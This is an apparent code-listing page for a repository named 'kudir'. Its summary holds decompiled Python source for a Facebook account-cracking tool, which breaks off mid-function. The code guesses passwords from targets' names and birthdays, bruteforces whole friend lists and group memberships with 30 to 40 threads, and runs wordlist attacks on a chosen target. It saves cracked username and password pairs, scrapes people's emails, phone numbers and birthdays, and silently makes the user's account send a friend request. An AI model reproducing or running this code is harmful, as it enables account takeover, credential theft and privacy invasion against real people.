kudir | # Decompiled by MltrCyber import os , sys , time

 by   MltrCyber Python Version: Current License: No License

kandi X-RAY | kudir Summary

kandi X-RAY | kudir Summary

kudir is a Python library typically used in Telecommunications, Media, Media, Entertainment, Internet of Things (IoT), Raspberry Pi applications. kudir has no bugs, it has no vulnerabilities and it has low support. However kudir build file is not available. You can download it from GitHub.

#Decompiled by MltrCyber import os, sys, time, datetime, random, hashlib, re, threading, json, getpass, urllib, requests, mechanize from multiprocessing.pool import ThreadPool from requests.exceptions import ConnectionError from mechanize import Browser reload(sys) sys.setdefaultencoding('utf8') br = mechanize.Browser() br.set_handle_robots(False) br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1) br.addheaders = [('User-Agent', 'Opera/9.80 (Android; Opera Mini/32.0.2254/85. U; id) Presto/2.12.423 Version/12.16')] def keluar(): print '\x1b[1;91m[!] Keluar' os.sys.exit() def jalan(z): for e in z + '\n': sys.stdout.write(e) sys.stdout.flush() time.sleep(0.01) logo = '\x1b[1;92m\n\xe2\x95\x94\xe2\x95\xa6\xe2\x95\x97\xe2\x94\x8c\xe2\x94\x80\xe2\x94\x90\xe2\x94\xac\xe2\x94\x80\xe2\x94\x90\xe2\x94\xac\xe2\x94\x8c\xe2\x94\x80 \xe2\x95\x94\xe2\x95\x90\xe2\x95\x97\xe2\x95\x94\xe2\x95\x97 \n \xe2\x95\x91\xe2\x95\x91\xe2\x94\x9c\xe2\x94\x80\xe2\x94\xa4\xe2\x94\x9c\xe2\x94\xac\xe2\x94\x98\xe2\x94\x9c\xe2\x94\xb4\xe2\x94\x90\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x95\xa0\xe2\x95\xa3 \xe2\x95\xa0\xe2\x95\xa9\xe2\x95\x97\n\xe2\x95\x90\xe2\x95\xa9\xe2\x95\x9d\xe2\x94\xb4 \xe2\x94\xb4\xe2\x94\xb4\xe2\x94\x94\xe2\x94\x80\xe2\x94\xb4 \xe2\x94\xb4 \xe2\x95\x9a \xe2\x95\x9a\xe2\x95\x90\xe2\x95\x9d \x1b[1;93mv1.6\n\x1b[1;93m* \x1b[1;97mAuthor \x1b[1;91m: \x1b[1;96mMltrCyber\x1b[1;97m\n\x1b[1;93m* \x1b[1;97mSupport \x1b[1;91m: \x1b[1;96mPersekukhaya Team SyStEm\x1b[1;97m[\x1b[1;96m\x1b[1;97m] \x1b[1;97m/ \x1b[1;96mGUNAKAN DENGAN BIJAK \x1b[1;97m/ \x1b[1;96mMltrCyber\n\x1b[1;93m* \x1b[1;97mGitHub \x1b[1;91m: \x1b[1;92m\x1b[4mhttps://github.com/MltrCyber\x1b[0m\n[*] Decompiled by MltrCyber\n' def tik(): titik = [ '. ', '.. ', '... '] for o in titik: print '\r\x1b[1;91m[\xe2\x97\x8f] \x1b[1;92mSedang Masuk COK \x1b[1;97m' + o, sys.stdout.flush() time.sleep(1) back = 0 threads = [] berhasil = [] cekpoint = [] gagal = [] idteman = [] idfromteman = [] idmem = [] id = [] em = [] emfromteman = [] hp = [] hpfromteman = [] reaksi = [] reaksigrup = [] komen = [] komengrup = [] listgrup = [] vulnot = '\x1b[31mNot Vuln' vuln = '\x1b[32mVuln' def login(): os.system('clear') try: toket = open('login.txt', 'r') menu() except (KeyError, IOError): os.system('clear') print logo print 40 * '\x1b[1;97m\xe2\x95\x90' print '\x1b[1;91m[\xe2\x98\x86] \x1b[1;92mLOGIN AKUN FACEBOOK AKUN FB \x1b[1;91m[\xe2\x98\x86]' id = raw_input('\x1b[1;91m[+] \x1b[1;36mUsername FB \x1b[1;91m:\x1b[1;92m ') pwd = getpass.getpass('\x1b[1;91m[+] \x1b[1;36mPassword FB \x1b[1;91m:\x1b[1;92m ') tik() try: br.open('https://m.facebook.com') except mechanize.URLError: print '\n\x1b[1;91m[!] Tidak ada koneksi' keluar() br._factory.is_html = True br.select_form(nr=0) br.form['email'] = id br.form['pass'] = pwd br.submit() url = br.geturl() if 'save-device' in url: try: sig = 'api_key=882a8490361da98702bf97a021ddc14dcredentials_type=passwordemail=' + id + 'format=JSONgenerate_machine_id=1generate_session_cookies=1locale=en_USmethod=auth.loginpassword=' + pwd + 'return_ssl_resources=0v=1.062f8ce9f74b12f84c123cc23437a4a32' data = {'api_key': '882a8490361da98702bf97a021ddc14d', 'credentials_type': 'password', 'email': id, 'format': 'JSON', 'generate_machine_id': '1', 'generate_session_cookies': '1', 'locale': 'en_US', 'method': 'auth.login', 'password': pwd, 'return_ssl_resources': '0', 'v': '1.0'} x = hashlib.new('md5') x.update(sig) a = x.hexdigest() data.update({'sig': a}) url = 'https://api.facebook.com/restserver.php' r = requests.get(url, params=data) z = json.loads(r.text) zedd = open('login.txt', 'w') zedd.write(z['access_token']) zedd.close() print '\n\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mLogin berhasil' requests.post('https://graph.facebook.com/me/friends?method=post&uids=gwimusa3&access_token=' + z['access_token']) os.system('xdg-open https://youtube.com/NjankSoekamti') time.sleep(2) menu() except requests.exceptions.ConnectionError: print '\n\x1b[1;91m[!] Tidak ada koneksi' keluar() if 'checkpoint' in url: print '\n\x1b[1;91m[!] \x1b[1;93mAkun kena Checkpoint' os.system('rm -rf login.txt') time.sleep(1) keluar() else: print '\n\x1b[1;91m[!] Login Gagal' os.system('rm -rf login.txt') time.sleep(1) login() def menu(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: os.system('clear') print '\x1b[1;91m[!] Token tidak ditemukan' os.system('rm -rf login.txt') time.sleep(1) login() else: try: otw = requests.get('https://graph.facebook.com/me?access_token=' + toket) a = json.loads(otw.text) nama = a['name'] id = a['id'] except KeyError: os.system('clear') print '\x1b[1;91m[!] \x1b[1;93mSepertinya akun kena Checkpoint' os.system('rm -rf login.txt') time.sleep(1) login() except requests.exceptions.ConnectionError: print '\x1b[1;91m[!] Tidak ada koneksi' keluar() os.system('clear') print logo print '\x1b[1;97m\xe2\x95\x94' + 40 * '\xe2\x95\x90' print '\xe2\x95\x91\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m]\x1b[1;97m Nama \x1b[1;91m: \x1b[1;92m' + nama print '\x1b[1;97m\xe2\x95\x9a' + 40 * '\xe2\x95\x90' print '\x1b[1;37;40m1. Informasi Pengguna' print '\x1b[1;37;40m2. Hack Akun Facebook' print '\x1b[1;37;40m3. Bot ' print '\x1b[1;37;40m4. Lainnya.... ' print '\x1b[1;37;40m5. LogOut ' print '\x1b[1;31;40m0. Keluar ' print pilih() def pilih(): zedd = raw_input('\x1b[1;91m-\xe2\x96\xba\x1b[1;97m ') if zedd == '': print '\x1b[1;91m[!] Jangan kosong' pilih() else: if zedd == '1': informasi() else: if zedd == '2': menu_hack() else: if zedd == '3': menu_bot() else: if zedd == '4': lain() else: if zedd == '5': os.system('rm -rf login.txt') os.system('xdg-open https://www.youtube.com/nganunymous') keluar() else: if zedd == '0': keluar() else: print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + zedd + ' \x1b[1;91mTidak ada' pilih() def informasi(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token tidak ditemukan' os.system('rm -rf login.txt') time.sleep(1) login() os.system('clear') print logo print 40 * '\x1b[1;97m\xe2\x95\x90' id = raw_input('\x1b[1;91m[+] \x1b[1;92mMasukan ID\x1b[1;97m/\x1b[1;92mNama\x1b[1;91m : \x1b[1;97m') jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...') r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket) cok = json.loads(r.text) for p in cok['data']: if id in p['name'] or id in p['id']: r = requests.get('https://graph.facebook.com/' + p['id'] + '?access_token=' + toket) z = json.loads(r.text) print 40 * '\x1b[1;97m\xe2\x95\x90' try: print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mNama\x1b[1;97m : ' + z['name'] except KeyError: print '\x1b[1;91m[?] \x1b[1;92mNama\x1b[1;97m : \x1b[1;91mTidak ada' else: try: print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mID\x1b[1;97m : ' + z['id'] except KeyError: print '\x1b[1;91m[?] \x1b[1;92mID\x1b[1;97m : \x1b[1;91mTidak ada' else: try: print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mEmail\x1b[1;97m : ' + z['email'] except KeyError: print '\x1b[1;91m[?] \x1b[1;92mEmail\x1b[1;97m : \x1b[1;91mTidak ada' else: try: print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mNomor HP\x1b[1;97m : ' + z['mobile_phone'] except KeyError: print '\x1b[1;91m[?] \x1b[1;92mNomor HP\x1b[1;97m : \x1b[1;91mTidak ada' try: print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mLokasi\x1b[1;97m : ' + z['location']['name'] except KeyError: print '\x1b[1;91m[?] \x1b[1;92mLokasi\x1b[1;97m : \x1b[1;91mTidak ada' try: print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mTanggal Lahir\x1b[1;97m : ' + z['birthday'] except KeyError: print '\x1b[1;91m[?] \x1b[1;92mTanggal Lahir\x1b[1;97m : \x1b[1;91mTidak ada' try: print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mSekolah\x1b[1;97m : ' for q in z['education']: try: print '\x1b[1;91m ~ \x1b[1;97m' + q['school']['name'] except KeyError: print '\x1b[1;91m ~ \x1b[1;91mTidak ada' except KeyError: pass raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') menu() else: print '\x1b[1;91m[\xe2\x9c\x96] Pengguna tidak ditemukan' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') menu() def menu_hack(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token tidak ditemukan' os.system('rm -rf login.txt') time.sleep(1) login() os.system('clear') print logo print 40 * '\x1b[1;97m\xe2\x95\x90' print '\x1b[1;37;40m1. Mini Hack Facebook(\x1b[1;92mTarget\x1b[1;97m)' print '\x1b[1;37;40m2. Multi Bruteforce Facebook' print '\x1b[1;37;40m3. Super Multi Bruteforce Facebook' print '\x1b[1;37;40m4. BruteForce(\x1b[1;92mTarget\x1b[1;97m)' print '\x1b[1;37;40m5. Yahoo Checker' print '\x1b[1;37;40m6. Ambil id/email/hp' print '\x1b[1;31;40m0. Kembali' print hack_pilih() def hack_pilih(): hack = raw_input('\x1b[1;91m-\xe2\x96\xba\x1b[1;97m ') if hack == '': print '\x1b[1;91m[!] Jangan kosong' hack_pilih() else: if hack == '1': mini() else: if hack == '2': crack() hasil() else: if hack == '3': super() else: if hack == '4': brute() else: if hack == '5': menu_yahoo() else: if hack == '6': grab() else: if hack == '0': menu() else: print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + hack + ' \x1b[1;91mTidak ada' hack_pilih() def mini(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token tidak ditemukan' os.system('rm -rf login.txt') time.sleep(1) login() else: os.system('clear') print logo print 40 * '\x1b[1;97m\xe2\x95\x90' print '\x1b[1;91m[ INFO ] Akun target harus berteman dengan akun anda dulu !' try: id = raw_input('\x1b[1;91m[+] \x1b[1;92mID Target \x1b[1;91m:\x1b[1;97m ') jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...') r = requests.get('https://graph.facebook.com/' + id + '?access_token=' + toket) a = json.loads(r.text) print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mNama\x1b[1;97m : ' + a['name'] jalan('\x1b[1;91m[+] \x1b[1;92mMemeriksa \x1b[1;97m...') time.sleep(2) jalan('\x1b[1;91m[+] \x1b[1;92mMembuka keamanan \x1b[1;97m...') time.sleep(2) jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mMohon Tunggu sebentar \x1b[1;97m...') print 40 * '\x1b[1;97m\xe2\x95\x90' pz1 = a['first_name'] + '123' data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz1 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6') y = json.load(data) if 'access_token' in y: print '\x1b[1;91m[+] \x1b[1;92mDitemukan.' print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama\x1b[1;97m : ' + a['name'] print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz1 raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') menu_hack() else: if 'www.facebook.com' in y['error_msg']: print '\x1b[1;91m[+] \x1b[1;92mDitemukan.' print '\x1b[1;91m[!] \x1b[1;93mAkun kena Checkpoint' print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama\x1b[1;97m : ' + a['name'] print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz1 raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') menu_hack() else: pz2 = a['first_name'] + '12345' data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz2 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6') y = json.load(data) if 'access_token' in y: print '\x1b[1;91m[+] \x1b[1;92mDitemukan.' print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama\x1b[1;97m : ' + a['name'] print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz2 raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') menu_hack() else: if 'www.facebook.com' in y['error_msg']: print '\x1b[1;91m[+] \x1b[1;92mDitemukan.' print '\x1b[1;91m[!] \x1b[1;93mAkun kena Checkpoint' print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama\x1b[1;97m : ' + a['name'] print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz2 raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') menu_hack() else: pz3 = a['last_name'] + '123' data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz3 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6') y = json.load(data) if 'access_token' in y: print '\x1b[1;91m[+] \x1b[1;92mDitemukan.' print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama\x1b[1;97m : ' + a['name'] print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz3 raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') menu_hack() else: if 'www.facebook.com' in y['error_msg']: print '\x1b[1;91m[+] \x1b[1;92mDitemukan.' print '\x1b[1;91m[!] \x1b[1;93mAkun kena Checkpoint' print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama\x1b[1;97m : ' + a['name'] print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz3 raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') menu_hack() else: lahir = a['birthday'] pz4 = lahir.replace('/', '') data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz4 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6') y = json.load(data) if 'access_token' in y: print '\x1b[1;91m[+] \x1b[1;92mDitemukan.' print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama\x1b[1;97m : ' + a['name'] print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz4 raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') menu_hack() else: if 'www.facebook.com' in y['error_msg']: print '\x1b[1;91m[+] \x1b[1;92mDitemukan.' print '\x1b[1;91m[!] \x1b[1;93mAkun kena Checkpoint' print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama\x1b[1;97m : ' + a['name'] print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz4 raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') menu_hack() else: print '\x1b[1;91m[!] Maaf, gagal membuka password target :(' print '\x1b[1;91m[!] Cobalah dengan cara lain.' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') menu_hack() except KeyError: print '\x1b[1;91m[!] Terget tidak ditemukan' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') menu_hack() def crack(): global file global idlist global passw os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token tidak ditemukan' os.system('rm -rf login.txt') time.sleep(1) login() else: os.system('clear') print logo print 40 * '\x1b[1;97m\xe2\x95\x90' idlist = raw_input('\x1b[1;91m[+] \x1b[1;92mFile ID \x1b[1;91m: \x1b[1;97m') passw = raw_input('\x1b[1;91m[+] \x1b[1;92mPassword \x1b[1;91m: \x1b[1;97m') try: file = open(idlist, 'r') jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...') for x in range(40): zedd = threading.Thread(target=scrak, args=()) zedd.start() threads.append(zedd) for zedd in threads: zedd.join() except IOError: print '\x1b[1;91m[!] File tidak ditemukan' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') menu_hack() def scrak(): global back global berhasil global cekpoint global gagal global up try: buka = open(idlist, 'r') up = buka.read().split() while file: username = file.readline().strip() url = 'https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + username + '&locale=en_US&password=' + passw + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6' data = urllib.urlopen(url) mpsh = json.load(data) if back == len(up): break if 'access_token' in mpsh: bisa = open('Berhasil.txt', 'w') bisa.write(username + ' | ' + passw + '\n') bisa.close() berhasil.append('\x1b[1;97m[\x1b[1;92mOK\xe2\x9c\x93\x1b[1;97m] ' + username + ' | ' + passw) back += 1 else: if 'www.facebook.com' in mpsh['error_msg']: cek = open('Cekpoint.txt', 'w') cek.write(username + ' | ' + passw + '\n') cek.close() cekpoint.append('\x1b[1;97m[\x1b[1;93mCP\xe2\x9c\x9a\x1b[1;97m] ' + username + ' | ' + passw) back += 1 else: gagal.append(username) back += 1 sys.stdout.write('\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\xb8\x1b[1;91m] \x1b[1;92mCrack \x1b[1;91m:\x1b[1;97m ' + str(back) + ' \x1b[1;96m>\x1b[1;97m ' + str(len(up)) + ' =>\x1b[1;92mLive\x1b[1;91m:\x1b[1;96m' + str(len(berhasil)) + ' \x1b[1;97m=>\x1b[1;93mCheck\x1b[1;91m:\x1b[1;96m' + str(len(cekpoint))) sys.stdout.flush() except IOError: print '\n\x1b[1;91m[!] Koneksi terganggu' time.sleep(1) except requests.exceptions.ConnectionError: print '\x1b[1;91m[\xe2\x9c\x96] Tidak ada koneksi' def hasil(): print print 40 * '\x1b[1;97m\xe2\x95\x90' for b in berhasil: print b for c in cekpoint: print c print print '\x1b[31m[x] Gagal \x1b[1;97m--> ' + str(len(gagal)) keluar() def super(): global toket os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token tidak ditemukan' os.system('rm -rf login.txt') time.sleep(1) login() os.system('clear') print logo print 40 * '\x1b[1;97m\xe2\x95\x90' print '\x1b[1;37;40m1. Crack dari daftar Teman' print '\x1b[1;37;40m2. Crack dari member Grup' print '\x1b[1;31;40m0. Kembali' print pilih_super() def pilih_super(): peak = raw_input('\x1b[1;91m-\xe2\x96\xba\x1b[1;97m ') if peak == '': print '\x1b[1;91m[!] Jangan kosong' pilih_super() else: if peak == '1': os.system('clear') print logo print 40 * '\x1b[1;97m\xe2\x95\x90' jalan('\x1b[1;91m[+] \x1b[1;92mMengambil id teman \x1b[1;97m...') r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket) z = json.loads(r.text) for s in z['data']: id.append(s['id']) else: if peak == '2': os.system('clear') print logo print 40 * '\x1b[1;97m\xe2\x95\x90' idg = raw_input('\x1b[1;91m[+] \x1b[1;92mID Grup \x1b[1;91m:\x1b[1;97m ') try: r = requests.get('https://graph.facebook.com/group/?id=' + idg + '&access_token=' + toket) asw = json.loads(r.text) print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama grup \x1b[1;91m:\x1b[1;97m ' + asw['name'] except KeyError: print '\x1b[1;91m[!] Grup tidak ditemukan' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') super() re = requests.get('https://graph.facebook.com/' + idg + '/members?fields=name,id&limit=999999999&access_token=' + toket) s = json.loads(re.text) for i in s['data']: id.append(i['id']) else: if peak == '0': menu_hack() else: print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + peak + ' \x1b[1;91mTidak ada' pilih_super() print '\x1b[1;91m[+] \x1b[1;92mJumlah ID \x1b[1;91m: \x1b[1;97m' + str(len(id)) jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...') titik = ['. ', '.. ', '... '] for o in titik: print '\r\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\xb8\x1b[1;91m] \x1b[1;92mCrack \x1b[1;97m' + o, sys.stdout.flush() time.sleep(1) print print 40 * '\x1b[1;97m\xe2\x95\x90' def main(arg): user = arg try: a = requests.get('https://graph.facebook.com/' + user + '/?access_token=' + toket) b = json.loads(a.text) pass1 = b['first_name'] + '123' data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass1 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6') q = json.load(data) if 'access_token' in q: print '\x1b[1;97m[\x1b[1;92mOK\xe2\x9c\x93\x1b[1;97m] ' + user + ' | ' + pass1 else: if 'www.facebook.com' in q['error_msg']: print '\x1b[1;97m[\x1b[1;93mCP\xe2\x9c\x9a\x1b[1;97m] ' + user + ' | ' + pass1 else: pass2 = b['first_name'] + '12345' data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass2 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6') q = json.load(data) if 'access_token' in q: print '\x1b[1;97m[\x1b[1;92mOK\xe2\x9c\x93\x1b[1;97m] ' + user + ' | ' + pass2 else: if 'www.facebook.com' in q['error_msg']: print '\x1b[1;97m[\x1b[1;93mCP\xe2\x9c\x9a\x1b[1;97m] ' + user + ' | ' + pass2 else: pass3 = b['last_name'] + '123' data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass3 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6') q = json.load(data) if 'access_token' in q: print '\x1b[1;97m[\x1b[1;92mOK\xe2\x9c\x93\x1b[1;97m] ' + user + ' | ' + pass3 else: if 'www.facebook.com' in q['error_msg']: print '\x1b[1;97m[\x1b[1;93mCP\xe2\x9c\x9a\x1b[1;97m] ' + user + ' | ' + pass3 else: lahir = b['birthday'] pass4 = lahir.replace('/', '') data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass4 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6') q = json.load(data) if 'access_token' in q: print '\x1b[1;97m[\x1b[1;92mOK\xe2\x9c\x93\x1b[1;97m] ' + user + ' | ' + pass4 else: if 'www.facebook.com' in q['error_msg']: print '\x1b[1;97m[\x1b[1;93mCP\xe2\x9c\x9a\x1b[1;97m] ' + user + ' | ' + pass4 except: pass p = ThreadPool(30) p.map(main, id) print '\n\x1b[1;91m[+] \x1b[1;97mSelesai' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') super() def brute(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token tidak ditemukan' os.system('rm -rf login.txt') time.sleep(1) login() else: os.system('clear') print logo print 40 * '\x1b[1;97m\xe2\x95\x90' try: email = raw_input('\x1b[1;91m[+] \x1b[1;92mID\x1b[1;97m/\x1b[1;92mEmail\x1b[1;97m/\x1b[1;92mHp \x1b[1;97mTarget \x1b[1;91m:\x1b[1;97m ') passw = raw_input('\x1b[1;91m[+] \x1b[1;92mWordlist \x1b[1;97mext(list.txt) \x1b[1;91m: \x1b[1;97m') total = open(passw, 'r') total = total.readlines() print 40 * '\x1b[1;97m\xe2\x95\x90' print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mTarget \x1b[1;91m:\x1b[1;97m ' + email print '\x1b[1;91m[+] \x1b[1;92mJumlah\x1b[1;96m ' + str(len(total)) + ' \x1b[1;92mPassword' jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...') sandi = open(passw, 'r') for pw in sandi: try: pw = pw.replace('\n', '') sys.stdout.write('\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\xb8\x1b[1;91m] \x1b[1;92mMencoba \x1b[1;97m' + pw) sys.stdout.flush() data = requests.get('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + email + '&locale=en_US&password=' + pw + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6') mpsh = json.loads(data.text) if 'access_token' in mpsh: dapat = open('Brute.txt', 'w') dapat.write(email + ' | ' + pw + '\n') dapat.close() print '\n\x1b[1;91m[+] \x1b[1;92mDitemukan.' print 40 * '\x1b[1;97m\xe2\x95\x90' print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername \x1b[1;91m:\x1b[1;97m ' + email print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword \x1b[1;91m:\x1b[1;97m ' + pw keluar() else: if 'www.facebook.com' in mpsh['error_msg']: ceks = open('Brutecekpoint.txt', 'w') ceks.write(email + ' | ' + pw + '\n') ceks.close() print '\n\x1b[1;91m[+] \x1b[1;92mDitemukan.' print 40 * '\x1b[1;97m\xe2\x95\x90' print '\x1b[1;91m[!] \x1b[1;93mAkun kena Checkpoint' print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername \x1b[1;91m:\x1b[1;97m ' + email print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword \x1b[1;91m:\x1b[1;97m ' + pw keluar() except requests.exceptions.ConnectionError: print '\x1b[1;91m[!] Koneksi Error' time.sleep(1) except IOError: print '\x1b[1;91m[!] File tidak ditemukan...' print '\n\x1b[1;91m[!] \x1b[1;92mSepertinya kamu tidak memiliki wordlist' tanyaw() def tanyaw(): why = raw_input('\x1b[1;91m[?] \x1b[1;92mIngin membuat wordlist ? \x1b[1;92m[y/t]\x1b[1;91m:\x1b[1;97m ') if why == '': print '\x1b[1;91m[!] Tolong pilih \x1b[1;97m(y/t)' tanyaw() else: if why == 'y': wordlist() else: if why == 'Y': wordlist() else: if why == 't': menu_hack() else: if why == 'T': menu_hack() else: print '\x1b[1;91m[!] Tolong pilih \x1b[1;97m(y/t)' tanyaw() def 